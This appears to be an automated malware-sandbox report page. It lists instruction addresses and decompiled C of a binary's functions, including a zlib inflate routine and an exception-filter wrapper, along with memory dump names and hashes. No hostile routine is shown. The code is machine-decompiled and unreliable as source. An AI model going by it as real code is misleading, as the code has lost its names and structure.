0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f442
0x00000000
0x0040f420
0x0040f419
0x0040f3e3
0x0040f3e3
0x0040f3e6
0x0040f3ed
0x0040f3ef
0x0040f3f1
0x0040f3f5
0x0040f3f9
0x0040f3fe
0x00000000
0x0040f3fe
0x0040f390
0x00000000
0x0040f390
0x0040f390
0x0040f390
0x0040f392
0x00000000
0x00000000
0x0040f398
0x0040f3a4
0x0040f3a6
0x0040f3ab
0x0040f3ae
0x0040f3af
0x0040f3b3
0x0040f3c5
0x0040f3d0
0x0040f3d4
0x0040f3d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f3d6
0x00000000
0x0040f390
0x00000000
0x0040f578
0x0040f57b
0x0040f581
0x0040f585
0x0040f585
0x0040f58d
0x00000000
0x0040f58d
0x00000000
0x00000000
0x0040f699
0x0040f699
0x00000000
0x00000000
0x0040f69f
0x0040f69f
0x0040f6a2
0x0040f711
0x0040f717
0x0040f728
0x0040f732
0x0040f73d
0x0040f73f
0x0040f784
0x0040f784
0x0040f786
0x0040f850
0x0040f855
0x0040f858
0x0040f85e
0x0040f860
0x0040f867
0x0040f86b
0x0040f86e
0x0040f870
0x0040f87d
0x0040f87d
0x0040f87f
0x0040f896
0x0040f896
0x0040f898
0x0040f8b0
0x0040f8b3
0x0040f8b3
0x0040f8b6
0x0040f8bc
0x00000000
0x0040f89a
0x0040f89a
0x0040f89a
0x0040f89e
0x0040f8a5
0x00000000
0x0040f8a5
0x0040f881
0x0040f881
0x0040f881
0x0040f88b
0x00000000
0x0040f88b
0x0040f872
0x0040f872
0x0040f872
0x00000000
0x0040f872
0x0040f78c
0x0040f78c
0x0040f78c
0x0040f78e
0x00000000
0x0040f794
0x0040f794
0x0040f79b
0x0040f79e
0x0040f7a3
0x0040f7b4
0x0040f7c4
0x0040f7d8
0x0040f7da
0x0040f837
0x0040f837
0x0040f83b
0x0040f83f
0x0040f846
0x0040f848
0x0040f848
0x0040f84a
0x00000000
0x0040f7e0
0x00000000
0x0040f7e0
0x0040f7e0
0x0040f7e0
0x0040f7e2
0x00000000
0x00000000
0x0040f7e8
0x0040f7e8
0x0040f7ec
0x0040f7f3
0x0040f7f6
0x0040f7fd
0x0040f806
0x0040f80a
0x0040f826
0x0040f833
0x0040f835
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f835
0x00000000
0x0040f7e0
0x0040f7da
0x0040f78e
0x0040f741
0x0040f741
0x0040f741
0x0040f741
0x0040f743
0x00000000
0x00000000
0x0040f749
0x0040f74e
0x0040f750
0x0040f759
0x0040f75c
0x0040f760
0x0040f766
0x0040f771
0x0040f776
0x0040f780
0x0040f782
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f782
0x00000000
0x0040f741
0x0040f6a4
0x0040f6a4
0x0040f6a4
0x0040f6ac
0x00000000
0x0040f6ae
0x0040f6ae
0x0040f6b2
0x0040f6b6
0x0040f6bd
0x0040f6c0
0x0040f6c2
0x0040f6c5
0x0040f6c6
0x0040f6c9
0x0040f6cc
0x0040f6d1
0x0040f6d5
0x0040f6d8
0x0040f6db
0x0040f6de
0x0040f6e4
0x0040f6e6
0x0040f6e9
0x0040f6f0
0x0040f6f4
0x0040f6f8
0x0040f6fc
0x0040f702
0x0040f702
0x00000000
0x0040f6fc
0x0040f6ac
0x00000000
0x00000000
0x0040f8bf
0x0040f8bf
0x0040f8c2
0x0040f8c4
0x0040f910
0x0040f913
0x0040f919
0x00000000
0x0040f8c6
0x0040f8c6
0x0040f8c6
0x0040f8c8
0x0040f8f5
0x0040f8fa
0x0040f8ff
0x0040f901
0x0040f903
0x0040f906
0x0040f906
0x0040f906
0x0040f90c
0x00000000
0x0040f8d0
0x00000000
0x0040f8d0
0x0040f8d0
0x0040f8d0
0x0040f8d2
0x00000000
0x00000000
0x0040f8d8
0x0040f8dd
0x0040f8df
0x0040f8e0
0x0040f8e3
0x0040f8e5
0x0040f8e8
0x0040f8ec
0x0040f8ed
0x0040f8f1
0x0040f8f3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f8f3
0x00000000
0x0040f8d0
0x0040f8c8
0x00000000
0x00000000
0x0040f91f
0x0040f925
0x0040f936
0x0040f941
0x0040f943
0x0040f988
0x0040f988
0x0040f98a
0x0040fa44
0x0040fa44
0x0040fa4d
0x0040fa50
0x0040fa56
0x0040fa58
0x0040fa5a
0x0040fa5e
0x0040fa60
0x0040fa78
0x0040fa7a
0x0040fa86
0x0040fa86
0x0040fa89
0x0040fa8c
0x00000000
0x0040fa62
0x0040fa62
0x0040fa62
0x0040fa66
0x0040fa6d
0x00000000
0x0040fa6d
0x0040f990
0x0040f990
0x0040f997
0x0040f99a
0x0040f99f
0x0040f9b0
0x0040f9c0
0x0040f9d4
0x0040f9d6
0x0040fa2f
0x0040fa2f
0x0040fa33
0x0040fa3a
0x0040fa3c
0x0040fa3e
0x0040fa3e
0x0040fa3e
0x00000000
0x0040f9d8
0x0040f9d8
0x0040f9d8
0x0040f9d8
0x0040f9da
0x00000000
0x00000000
0x0040f9e0
0x0040f9e0
0x0040f9e4
0x0040f9eb
0x0040f9ee
0x0040f9f5
0x0040f9fe
0x0040fa02
0x0040fa1e
0x0040fa2b
0x0040fa2d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fa2d
0x00000000
0x0040f9d8
0x0040f9d6
0x0040f945
0x0040f945
0x0040f945
0x0040f945
0x0040f947
0x00000000
0x00000000
0x0040f94d
0x0040f952
0x0040f954
0x0040f95d
0x0040f960
0x0040f964
0x0040f96a
0x0040f975
0x0040f97a
0x0040f984
0x0040f986
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f986
0x00000000
0x0040f945
0x00000000
0x00000000
0x0040fa8f
0x0040fa8f
0x0040fa92
0x0040fa94
0x0040fae0
0x0040fae0
0x00000000
0x0040fa96
0x0040fa96
0x0040fa96
0x0040fa98
0x0040fac5
0x0040faca
0x0040facf
0x0040fad1
0x0040fad3
0x0040fad6
0x0040fad6
0x0040fad6
0x0040fadc
0x00000000
0x0040faa0
0x00000000
0x0040faa0
0x0040faa0
0x0040faa0
0x0040faa2
0x00000000
0x00000000
0x0040faa8
0x0040faad
0x0040faaf
0x0040fab0
0x0040fab3
0x0040fab5
0x0040fab8
0x0040fabc
0x0040fabd
0x0040fac1
0x0040fac3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fac3
0x00000000
0x0040faa0
0x0040fa98
0x00000000
0x00000000
0x0040fae6
0x0040fae6
0x0040faea
0x0040faec
0x00000000
0x0040faf2
0x0040faf2
0x0040faf6
0x0040faf8
0x0040fafb
0x0040fafd
0x0040fb4d
0x0040fb51
0x0040fb51
0x0040fb53
0x0040fb57
0x00000000
0x0040faff
0x0040faff
0x0040faff
0x0040fb01
0x0040fb04
0x0040fb25
0x0040fb25
0x0040fb28
0x0040fb2a
0x0040fb3d
0x0040fb3d
0x0040fb2c
0x0040fb2c
0x0040fb34
0x0040fb34
0x0040fb40
0x0040fb44
0x0040fb47
0x0040fb49
0x0040fb4b
0x0040fb5a
0x0040fb5a
0x0040fb5a
0x0040fb5c
0x0040fb5c
0x0040fb60
0x0040fb62
0x0040fb62
0x0040fb6c
0x0040fb70
0x0040fb73
0x0040fb77
0x0040fb77
0x0040fb80
0x0040fb80
0x0040fb83
0x0040fb85
0x0040fb86
0x0040fb86
0x0040fb86
0x0040fb89
0x0040fb8d
0x0040fb91
0x0040fb95
0x0040fb98
0x0040fb9e
0x0040fb9e
0x0040f1a6
0x0040f1a6
0x0040fb06
0x0040fb06
0x0040fb06
0x0040fb0d
0x00000000
0x0040fb0f
0x0040fb0f
0x0040fb0f
0x0040fb13
0x0040fb1a
0x0040fb1a
0x0040fb0d
0x0040fb04
0x00000000
0x0040fafd
0x00000000
0x00000000
0x0040fba9
0x0040fba9
0x0040fbae
0x00000000
0x0040fbb4
0x0040fbb4
0x0040fbb4
0x0040fbb8
0x0040fbbb
0x0040fbbf
0x0040fbc3
0x0040fbc5
0x0040fbc9
0x00000000
0x0040fbc9
0x00000000
0x00000000
0x0040fbd4
0x0040fbd4
0x0040fbd8
0x0040fbd9
0x0040fbdb
0x0040fbdd
0x0040fbdd
0x0040fbdd
0x00000000
0x0040fcac
0x0040fcac
0x0040fcb0
0x0040fd2c
0x0040fd2c
0x00000000
0x0040fcb2
0x0040fcb2
0x0040fcb2
0x0040fcb6
0x00000000
0x0040fcb8
0x0040fcb8
0x0040fcb8
0x0040fcbb
0x0040fce3
0x0040fce3
0x0040fce6
0x0040fd24
0x0040fd24
0x0040fd26
0x0040fd26
0x0040fd28
0x00000000
0x0040fce8
0x0040fce8
0x0040fce8
0x0040fcec
0x0040fcf3
0x00000000
0x0040fcf3
0x0040fcc0
0x00000000
0x0040fcc0
0x0040fcc0
0x0040fcc0
0x0040fcc2
0x00000000
0x00000000
0x0040fcc8
0x0040fcc8
0x0040fccb
0x0040fccd
0x0040fccf
0x0040fcd0
0x0040fcd2
0x0040fcd6
0x0040fcd9
0x0040fcdd
0x0040fcde
0x0040fce1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fce1
0x00000000
0x0040fcc0
0x0040fcbb
0x0040fcb6
0x00000000
0x00000000
0x0040fd32
0x0040fd32
0x00000000
0x00000000
0x0040fd3f
0x0040fd3f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e890
0x0040f1b5
0x0040f1c1
0x0040f1c1
0x0040f254
0x0040f254
0x0040f254
0x0040f257
0x00000000
0x0040f260
0x00000000
0x0040f260
0x0040f260
0x0040f262
0x00000000
0x00000000
0x0040f268
0x0040f26d
0x0040f26f
0x0040f270
0x0040f272
0x0040f276
0x0040f279
0x0040f27d
0x0040f281
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f281
0x00000000
0x0040f260
0x00000000
0x0040f283
0x0040f288
0x0040f28b
0x0040f28e
0x0040f291
0x0040f29d
0x0040f2a2
0x0040f2a8
0x00000000
0x0040f254
0x0040f252
0x0040f239
0x00000000
0x0040f22f

Strings

x1A, xrefs: 0040FB13

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: x1A
API String ID: 0-1646630478
Opcode ID: bae000775f9bd7815902f0e88db16ebb2c7b5e271d13db52e636695b4bdd36e2
Instruction ID: 289a58e561be91ddcdb4e2d479c1f16e8e44ae8c5c60d1ef544fec63d47ee422
Opcode Fuzzy Hash: bae000775f9bd7815902f0e88db16ebb2c7b5e271d13db52e636695b4bdd36e2
Instruction Fuzzy Hash: 4C62F0716047129FC728CF29C4906AAB7E1FFC4314F144A3EE8969BB80D379E859CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00411250, Relevance: 1.6, Strings: 1, Instructions: 383
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00411250() {
				intOrPtr _t148;
				signed int _t165;
				intOrPtr _t175;
				signed int _t187;
				void* _t189;
				signed int _t190;
				intOrPtr _t195;
				signed int _t202;
				char _t204;
				char _t207;
				intOrPtr _t208;
				char _t209;
				char _t212;
				intOrPtr* _t213;
				signed char* _t215;
				signed char* _t219;
				signed int _t236;
				intOrPtr _t248;
				unsigned int _t249;
				intOrPtr _t251;
				unsigned int _t254;
				intOrPtr* _t256;
				signed char _t263;
				intOrPtr* _t265;
				signed char _t269;
				signed char _t270;
				signed char* _t272;
				void* _t274;
				void* _t276;
				intOrPtr _t277;
				signed char _t279;
				signed char _t284;
				signed char _t287;
				signed char _t292;
				signed char* _t294;
				signed int _t295;
				void* _t296;
				signed char* _t297;
				signed char _t298;
				signed char _t299;
				signed char _t300;
				signed char _t301;
				signed char _t302;
				void* _t305;
				signed char _t308;
				signed char* _t309;
				signed char* _t310;
				unsigned int _t311;
				void* _t315;
				signed char* _t316;
				void* _t318;
				char* _t322;
				signed int _t323;
				signed int _t324;
				void* _t325;

				_t256 =  *((intOrPtr*)(_t325 + 0x4c));
				_t248 =  *((intOrPtr*)(_t256 + 0x1c));
				_t294 =  *_t256 - 1;
				_t323 =  *(_t248 + 0x3c);
				 *((intOrPtr*)(_t325 + 0x38)) =  *((intOrPtr*)(_t256 + 4)) + 0xfffffffb + _t294;
				_t322 =  *((intOrPtr*)(_t256 + 0xc)) - 1;
				_t148 =  *((intOrPtr*)(_t256 + 0x10));
				 *((intOrPtr*)(_t325 + 0x1c)) = _t248;
				 *((intOrPtr*)(_t325 + 0x14)) = _t148 + 0xfffffeff + _t322;
				 *((intOrPtr*)(_t325 + 0x30)) =  *((intOrPtr*)(_t248 + 0x28));
				 *((intOrPtr*)(_t325 + 0x44)) =  *((intOrPtr*)(_t248 + 0x2c));
				 *((intOrPtr*)(_t325 + 0x20)) =  *((intOrPtr*)(_t248 + 0x30));
				 *((intOrPtr*)(_t325 + 0x34)) =  *((intOrPtr*)(_t248 + 0x34));
				 *((intOrPtr*)(_t325 + 0x28)) =  *((intOrPtr*)(_t248 + 0x4c));
				 *((intOrPtr*)(_t325 + 0x2c)) =  *((intOrPtr*)(_t248 + 0x50));
				 *(_t325 + 0x18) = 1;
				 *((intOrPtr*)(_t325 + 0x40)) = _t148 -  *(_t325 + 0x50) + _t322;
				 *(_t325 + 0x18) =  *(_t325 + 0x18) <<  *(_t248 + 0x54);
				 *(_t325 + 0x18) =  *(_t325 + 0x18) - 1;
				 *(_t325 + 0x10) = _t294;
				_t311 =  *(_t248 + 0x38);
				 *(_t325 + 0x3c) = (1 <<  *(_t248 + 0x58)) - 1;
				do {
					if(_t323 < 0xf) {
						_t297 =  &(_t294[2]);
						 *(_t325 + 0x10) = _t297;
						_t311 = _t311 + ((_t294[1] & 0x000000ff) << _t323) + (( *_t297 & 0x000000ff) << _t323 + 8);
						_t323 = _t323 + 0x10;
					}
					_t249 =  *( *((intOrPtr*)(_t325 + 0x28)) + ( *(_t325 + 0x18) & _t311) * 4);
					_t263 = _t249 >> 0x00000008 & 0x000000ff;
					_t311 = _t311 >> _t263;
					_t323 = _t323 - _t263;
					_t295 = _t249 & 0x000000ff;
					if(_t249 == 0) {
						L7:
						_t322 = _t322 + 1;
						 *_t322 = _t249 >> 0x10;
						L47:
						_t294 =  *(_t325 + 0x10);
						_t251 =  *((intOrPtr*)(_t325 + 0x14));
						if(_t294 >=  *((intOrPtr*)(_t325 + 0x38))) {
							L62:
							_t165 = _t323 >> 3;
							_t296 = _t294 - _t165;
							_t324 = _t323 - (_t165 << 3);
							_t265 =  *((intOrPtr*)(_t325 + 0x4c));
							 *_t265 = _t296 + 1;
							 *((intOrPtr*)(_t265 + 0xc)) = _t322 + 1;
							 *((intOrPtr*)(_t265 + 4)) =  *((intOrPtr*)(_t325 + 0x38)) - _t296 + 5;
							_t175 =  *((intOrPtr*)(_t325 + 0x1c));
							 *((intOrPtr*)(_t265 + 0x10)) = _t251 - _t322 + 0x101;
							 *(_t175 + 0x38) = _t311 & (0x00000001 << _t324) - 0x00000001;
							 *(_t175 + 0x3c) = _t324;
							return _t175;
						}
						goto L48;
					}
					while((_t295 & 0x00000010) == 0) {
						if((_t295 & 0x00000040) != 0) {
							_t213 =  *((intOrPtr*)(_t325 + 0x1c));
							_t251 =  *((intOrPtr*)(_t325 + 0x14));
							_t294 =  *(_t325 + 0x10);
							if((_t295 & 0x00000020) == 0) {
								 *( *((intOrPtr*)(_t325 + 0x4c)) + 0x18) = "invalid literal/length code";
								L61:
								 *_t213 = 0x1d;
								goto L62;
							}
							 *_t213 = 0xb;
							goto L62;
						}
						_t249 =  *( *((intOrPtr*)(_t325 + 0x28)) + (((0x00000001 << _t295) - 0x00000001 & _t311) + (_t249 >> 0x10)) * 4);
						_t292 = _t249 >> 0x00000008 & 0x000000ff;
						_t311 = _t311 >> _t292;
						_t323 = _t323 - _t292;
						_t295 = _t249 & 0x000000ff;
						if(_t249 != 0) {
							continue;
						}
						goto L7;
					}
					_t254 = _t249 >> 0x10;
					_t298 = _t295 & 0x0000000f;
					if(_t298 != 0) {
						_t287 = _t298;
						_t236 = (0x00000001 << _t287) - 0x00000001 & _t311;
						_t311 = _t311 >> _t287;
						_t254 = _t254 + _t236;
						_t323 = _t323 - _t298;
					}
					if(_t323 < 0xf) {
						_t309 =  *(_t325 + 0x10);
						_t310 =  &(_t309[2]);
						 *(_t325 + 0x10) = _t310;
						_t311 = _t311 + ((_t309[1] & 0x000000ff) << _t323) + (( *_t310 & 0x000000ff) << _t323 + 8);
						_t323 = _t323 + 0x10;
					}
					_t299 =  *( *((intOrPtr*)(_t325 + 0x2c)) + ( *(_t325 + 0x3c) & _t311) * 4);
					_t269 = _t299 >> 0x00000008 & 0x000000ff;
					 *(_t325 + 0x50) = _t299;
					_t323 = _t323 - _t269;
					_t300 = _t299 & 0x000000ff;
					_t311 = _t311 >> _t269;
					if((_t300 & 0x00000010) != 0) {
						L17:
						 *(_t325 + 0x50) =  *(_t325 + 0x50) >> 0x10;
						_t301 = _t300 & 0x0000000f;
						if(_t323 < _t301) {
							_t279 = _t323;
							_t215 =  &(( *(_t325 + 0x10))[1]);
							_t323 = _t323 + 8;
							 *(_t325 + 0x10) = _t215;
							_t311 = _t311 + (( *_t215 & 0x000000ff) << _t279);
							if(_t323 < _t301) {
								_t219 =  &(( *(_t325 + 0x10))[1]);
								 *(_t325 + 0x10) = _t219;
								_t311 = _t311 + (( *_t219 & 0x000000ff) << _t323);
								_t323 = _t323 + 8;
							}
						}
						_t270 = _t301;
						_t323 = _t323 - _t301;
						_t187 = (0x00000001 << _t270) - 0x00000001 & _t311;
						_t311 = _t311 >> _t270;
						 *(_t325 + 0x50) =  *(_t325 + 0x50) + _t187;
						_t189 = _t322 -  *((intOrPtr*)(_t325 + 0x40));
						_t302 =  *(_t325 + 0x50);
						 *(_t325 + 0x24) = _t311;
						if(_t302 <= _t189) {
							_t272 = _t322 - _t302;
							do {
								_t190 = _t272[1] & 0x000000ff;
								_t272 =  &(_t272[3]);
								 *(_t322 + 1) = _t190;
								_t254 = _t254 - 3;
								 *(_t322 + 2) =  *(_t272 - 1) & 0x000000ff;
								_t322 = _t322 + 3;
								 *_t322 =  *_t272 & 0x000000ff;
							} while (_t254 > 2);
							if(_t254 != 0) {
								_t322 = _t322 + 1;
								 *_t322 = _t272[1];
								if(_t254 > 1) {
									_t322 = _t322 + 1;
									 *_t322 = _t272[2];
								}
							}
							goto L47;
						} else {
							_t274 = _t302 - _t189;
							if(_t274 <=  *((intOrPtr*)(_t325 + 0x44))) {
								L23:
								_t195 =  *((intOrPtr*)(_t325 + 0x20));
								_t315 =  *((intOrPtr*)(_t325 + 0x34)) - 1;
								if(_t195 != 0) {
									if(_t195 >= _t274) {
										_t316 = _t315 + _t195 - _t274;
										if(_t274 >= _t254) {
											L40:
											if(_t254 <= 2) {
												L43:
												if(_t254 != 0) {
													_t322 = _t322 + 1;
													 *_t322 = _t316[1];
													if(_t254 > 1) {
														_t322 = _t322 + 1;
														 *_t322 = _t316[2];
													}
												}
												_t311 =  *(_t325 + 0x24);
												goto L47;
											}
											_t305 = (0xaaaaaaab * (_t254 - 3) >> 0x20 >> 1) + 1;
											do {
												_t254 = _t254 - 3;
												 *(_t322 + 1) = _t316[1] & 0x000000ff;
												_t202 = _t316[2] & 0x000000ff;
												_t316 =  &(_t316[3]);
												 *(_t322 + 2) = _t202;
												_t322 = _t322 + 3;
												 *_t322 =  *_t316 & 0x000000ff;
												_t305 = _t305 - 1;
											} while (_t305 != 0);
											goto L43;
										}
										_t254 = _t254 - _t274;
										do {
											_t204 = _t316[1];
											_t316 =  &(_t316[1]);
											_t322 = _t322 + 1;
											 *_t322 = _t204;
											_t274 = _t274 - 1;
										} while (_t274 != 0);
										L39:
										_t316 = _t322 - _t302;
										goto L40;
									}
									_t276 = _t274 -  *((intOrPtr*)(_t325 + 0x20));
									_t316 = _t315 + _t195 - _t274 +  *((intOrPtr*)(_t325 + 0x30));
									if(_t276 >= _t254) {
										goto L40;
									}
									_t254 = _t254 - _t276;
									_t318 = _t316 - _t322;
									do {
										_t207 =  *((intOrPtr*)(_t318 + _t322 + 1));
										_t322 = _t322 + 1;
										 *_t322 = _t207;
										_t276 = _t276 - 1;
									} while (_t276 != 0);
									_t208 =  *((intOrPtr*)(_t325 + 0x20));
									_t316 =  *((intOrPtr*)(_t325 + 0x34)) - 1;
									if(_t208 >= _t254) {
										goto L40;
									}
									_t277 = _t208;
									_t254 = _t254 - _t208;
									do {
										_t209 = _t316[1];
										_t316 =  &(_t316[1]);
										_t322 = _t322 + 1;
										 *_t322 = _t209;
										_t277 = _t277 - 1;
									} while (_t277 != 0);
									goto L39;
								}
								_t316 = _t315 +  *((intOrPtr*)(_t325 + 0x30)) - _t274;
								if(_t274 >= _t254) {
									goto L40;
								}
								_t254 = _t254 - _t274;
								do {
									_t212 = _t316[1];
									_t316 =  &(_t316[1]);
									_t322 = _t322 + 1;
									 *_t322 = _t212;
									_t274 = _t274 - 1;
								} while (_t274 != 0);
								goto L39;
							}
							_t213 =  *((intOrPtr*)(_t325 + 0x1c));
							if( *((intOrPtr*)(_t213 + 0x1bc0)) != 0) {
								 *( *((intOrPtr*)(_t325 + 0x4c)) + 0x18) = "invalid distance too far back";
								goto L60;
							}
							goto L23;
						}
					} else {
						while((_t300 & 0x00000040) == 0) {
							_t308 =  *( *((intOrPtr*)(_t325 + 0x2c)) + (((0x00000001 << _t300) - 0x00000001 & _t311) + ( *(_t325 + 0x50) >> 0x10)) * 4);
							_t284 = _t308 >> 0x00000008 & 0x000000ff;
							 *(_t325 + 0x50) = _t308;
							_t323 = _t323 - _t284;
							_t300 = _t308 & 0x000000ff;
							_t311 = _t311 >> _t284;
							if((_t300 & 0x00000010) == 0) {
								continue;
							}
							goto L17;
						}
						_t213 =  *((intOrPtr*)(_t325 + 0x1c));
						 *( *((intOrPtr*)(_t325 + 0x4c)) + 0x18) = "invalid distance code";
						L60:
						_t251 =  *((intOrPtr*)(_t325 + 0x14));
						_t294 =  *(_t325 + 0x10);
						goto L61;
					}
					L48:
				} while (_t322 < _t251);
				goto L62;
			}

0x00411257
0x0041125b
0x00411263
0x0041126c
0x0041126f
0x00411273
0x00411274
0x00411284
0x00411288
0x00411291
0x00411298
0x0041129f
0x004112a6
0x004112ad
0x004112b4
0x004112bd
0x004112c1
0x004112c8
0x004112cf
0x004112d6
0x004112da
0x004112dd
0x004112e1
0x004112e4
0x004112ee
0x004112f3
0x004112ff
0x00411301
0x00411301
0x0041130e
0x00411316
0x00411319
0x0041131b
0x0041131d
0x00411322
0x0041135d
0x0041135d
0x00411361
0x0041157a
0x0041157a
0x0041157e
0x00411586
0x00411628
0x0041162c
0x0041162f
0x00411634
0x0041163f
0x00411649
0x0041164e
0x00411660
0x00411663
0x00411667
0x0041166a
0x0041166f
0x00411677
0x00411677
0x00000000
0x00411586
0x00411324
0x0041132c
0x004115d8
0x004115df
0x004115e3
0x004115e7
0x004115f5
0x00411622
0x00411622
0x00000000
0x00411622
0x004115e9
0x00000000
0x004115e9
0x00411347
0x0041134f
0x00411352
0x00411354
0x00411356
0x0041135b
0x00000000
0x00000000
0x00000000
0x0041135b
0x00411368
0x0041136b
0x0041136e
0x00411389
0x00411393
0x00411395
0x00411397
0x00411399
0x00411399
0x0041139e
0x004113a0
0x004113aa
0x004113b4
0x004113bd
0x004113bf
0x004113bf
0x004113cc
0x004113d4
0x004113d7
0x004113db
0x004113dd
0x004113e0
0x004113e5
0x00411424
0x00411424
0x00411429
0x0041142e
0x00411434
0x00411436
0x00411437
0x0041143a
0x00411443
0x00411447
0x0041144f
0x00411450
0x00411459
0x0041145b
0x0041145b
0x00411447
0x0041145e
0x00411467
0x0041146a
0x0041146c
0x0041146e
0x00411474
0x00411478
0x0041147c
0x00411482
0x0041159b
0x004115a0
0x004115a0
0x004115a4
0x004115a7
0x004115aa
0x004115b1
0x004115b4
0x004115ba
0x004115bc
0x004115c3
0x004115c8
0x004115c9
0x004115ce
0x004115d3
0x004115d4
0x004115d4
0x004115ce
0x00000000
0x00411488
0x0041148a
0x00411490
0x004114a3
0x004114a7
0x004114ab
0x004114ae
0x004114d0
0x00411511
0x00411515
0x00411530
0x00411533
0x00411561
0x00411563
0x00411568
0x00411569
0x0041156e
0x00411573
0x00411574
0x00411574
0x0041156e
0x00411576
0x00000000
0x00411576
0x00411541
0x00411542
0x00411546
0x00411549
0x0041154c
0x00411550
0x00411553
0x00411556
0x0041155c
0x0041155e
0x0041155e
0x00000000
0x00411542
0x00411517
0x00411520
0x00411520
0x00411523
0x00411526
0x00411527
0x00411529
0x00411529
0x0041152c
0x0041152e
0x00000000
0x0041152e
0x004114d4
0x004114dc
0x004114e0
0x00000000
0x00000000
0x004114e2
0x004114e4
0x004114e6
0x004114e6
0x004114ea
0x004114eb
0x004114ed
0x004114ed
0x004114f4
0x004114f8
0x004114fb
0x00000000
0x00000000
0x004114fd
0x004114ff
0x00411501
0x00411501
0x00411504
0x00411507
0x00411508
0x0041150a
0x0041150a
0x00000000
0x0041150d
0x004114b6
0x004114ba
0x00000000
0x00000000
0x004114bc
0x004114c0
0x004114c0
0x004114c3
0x004114c6
0x004114c7
0x004114c9
0x004114c9
0x00000000
0x004114cc
0x00411492
0x0041149d
0x00411613
0x00000000
0x00411613
0x00000000
0x0041149d
0x004113e7
0x004113e7
0x00411409
0x00411411
0x00411414
0x00411418
0x0041141a
0x0041141d
0x00411422
0x00000000
0x00000000
0x00000000
0x00411422
0x00411602
0x00411606
0x0041161a
0x0041161a
0x0041161e
0x00000000
0x0041161e
0x0041158c
0x0041158c
0x00000000

Strings

x1A, xrefs: 00411613

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: x1A
API String ID: 0-1646630478
Opcode ID: fdc212910d03c255f0785c9543c6bfeff31382a250498d77613c5968644664cf
Instruction ID: 52bba8912795a97967905f55eeb4341e7272e8ac0bf7e2902004463dd3c3107f
Opcode Fuzzy Hash: fdc212910d03c255f0785c9543c6bfeff31382a250498d77613c5968644664cf
Instruction Fuzzy Hash: 4ED1D7716083528FC704CF28C4802AABBE2EFD5344F184A6EE9D5CB352D379D98ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 004098F0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004098F0() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter( *0x4170f0);
				 *0x4170f0 = 0;
				return _t1;
			}

0x004098f6
0x004098fc
0x00409906

APIs

SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 004098F6

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
Instruction ID: 58fd1e7f992a672593766b16f957b5939387e25e4684d50d9e98353aec796854
Opcode Fuzzy Hash: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
Instruction Fuzzy Hash: 96B00178018352DBDB019F14FC0CBC43F72B748715F82C174941141274E7794458DA88

Uniqueness

Uniqueness Score: -1.00%

Function 0040C838, Relevance: .7, Instructions: 674
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0040C838() {
				signed int* _t109;
				signed int _t111;
				intOrPtr _t328;
				signed int _t329;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t357;
				signed int _t359;
				signed int _t521;
				signed int _t526;
				signed int _t530;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				signed int _t541;
				signed int _t544;
				signed char* _t546;
				signed int _t550;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t562;
				signed int _t564;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t577;
				signed int _t579;
				signed int _t581;
				signed int _t583;
				signed int _t586;
				void* _t587;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t605;
				signed int _t608;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t618;
				signed int _t620;
				signed int _t622;
				intOrPtr* _t623;
				signed int* _t624;
				signed int _t625;
				signed int _t628;
				signed int _t630;
				signed int _t632;
